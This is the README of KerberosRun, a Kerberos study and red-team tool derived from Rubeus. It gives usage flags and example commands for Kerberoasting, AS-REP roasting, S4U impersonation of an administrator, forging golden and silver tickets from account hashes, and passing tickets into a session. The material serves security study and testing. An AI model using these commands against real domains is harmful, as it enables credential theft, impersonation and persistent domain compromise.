
dev-2null / KerberosRun

Licence: MIT License
A little tool to play with Kerberos.

KerberosRun

KerberosRun is a little tool I use to study Kerberos internals together with my ADCollector. I'll try to learn and implement stuff from Rubeus, also something not in Rubeus.

KerberosRun uses the Kerberos.NET library built by Steve Syfuhs. It is heavily adapted from Harmj0y's Rubeus project (some code was taken directly from this project).

dev2null is the primary author of this project. My colleague Constantin is the collaborator who helped me build up the tool, had a lot of discussions with me and gave me ideas.

Thanks Steve for building this great library and having discussions with me to solve code problems. Thanks Harmj0y (and other authors) for the concepts and weaponization in Rubeus. Special thanks to @_dirkjan for helping me out regarding the KRBCRED structure and other questions.

Authentication Flows

AS Exchange

TGS Exchange: Unconstrained Delegation

TGS Exchange: S4U

TGS Exchange: Decrypted PAC

All In One

Usage

PS C:\Users\dev2null\Desktop> .\KerberosRun.exe    

   __           __
  / /_____ ____/ /  ___ _______  ___ ______ _____
 /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/

  v1.0.1

Usage: KerberosRun.exe -h
    
    [--AskTGT]              Ask for a TGT
        --User*             A valid username
        --Pass              A valid password
        --NopaC             Do not request PAC

    [--AskTGS]              Ask for a TGS
        --User*             A valid username
        --Pass              A valid password   
        --SPN*              Target SPN for the service request

    [--Kerberoast]          Kerberoasting
        --User*             A valid username
        --Pass              A valid password   
        --SPN*              Target SPN for Kerberoasting

    [--Asreproast]          ASREPRoasting
        --User*             A valid username that does not require PreAuth
        --Format            Output Hash format (John/Hashcat, Default: Hashcat)

    [--S4U2Self]            Service for User to Self
        --User*             A valid username that has SPN set
        --Pass              A valid password
        --ImperonsateUser*  A user to impersonate

    [--S4U]                 S4U2Self and S4U2Proxy
        --User*             A valid username that has SPN set
        --Pass              A valid password
        --Imperonsate*      A user to impersonate
        --SPN*              Target SPN for impersonate user

    [--Golden]              Build a Golden Ticket
        --RC4/AES128/AES256 krbtgt account hash
        --DomainSid*        Domain SIDs
        --UserID            User ID (default: 500)
        --User*             User name for the golden ticket

    [--Sliver]              Make a Sliver Ticket
        --RC4/AES128/AES256 Service account hash
        --DomainSid*        Domain SID
        --Service*          Service name (HTTP/CIFS/HOST...)
        --Host*             Target Servers
        --User*             User name for the sliver ticket

    [--Ticket]              Pass base64 encoded kirbi ticket into current session

     --Domain            A valid domain name (default: current domain)
     --RC4/AES128/AES256 A valid hash (alternative way for authentication) 
     --Verbose           Verbose mode
     --Outfile           Write the ticket to a kirbi file under the current directory
     --PTT               Pass the ticket into current session
     --DecryptTGT        Supply the krbtgt hash and decrypt the TGT ticket
     --DecryptTGS        Supply the service account hash and decrypt the TGS ticket
     --DecryptEtype   The encryption type of the hash for decrypting tickets (rc4/aes128/aes256) 
     --SrvName           The service account name for decrypting TGS


Example:  
        .\KerberosRun.exe --Asktgt --user username --pass password --nopac
        .\KerberosRun.exe --Asktgt --user username --pass password --verbose --outfile --decrypttgt [krbtgtHash] --decryptetype aes256
        .\KerberosRun.exe --Asktgs --user username --pass password --spn service/srv.domain.com --verbose --outfile
        .\KerberosRun.exe --Asreproast --user username --verbose
        .\KerberosRun.exe --Kerberoast --user username --rc4 [RC4Hash] --spn service/srv.domain.com
        .\KerberosRun.exe --S4U2Self --user username --aes128 [AES128Hash] --impersonateuser administrator --verbose
        .\KerberosRun.exe --S4U --user username --aes256 [AES256Hash] --impersonateuser administrator --spn ldap/dc1.domain.com --ptt
        .\KerberosRun.exe --Golden --user administrator --domain domain.com --userid 500 --domainsid  [DomainSID] --RC4 [krbtgtHash] --ptt
        .\KerberosRun.exe --Sliver --user administrator --domain domain.com --domainsid  [DomainSID] --RC4 [srvHash] --Service HTTP --HOST DC01$ -ptt
        .\KerberosRun.exe --Ticket Base64EncodedKirbiString/KirbiTicketFiles

Sample Commands & Results

| AskTGT | AskTGS | Asreproast | Kerberoast | S4U2Self | S4U | Golden | Sliver |

License

KerberosRun has an MIT License. See the License File for more details. Also see the Notices file for more information on the licenses of projects this depends on.
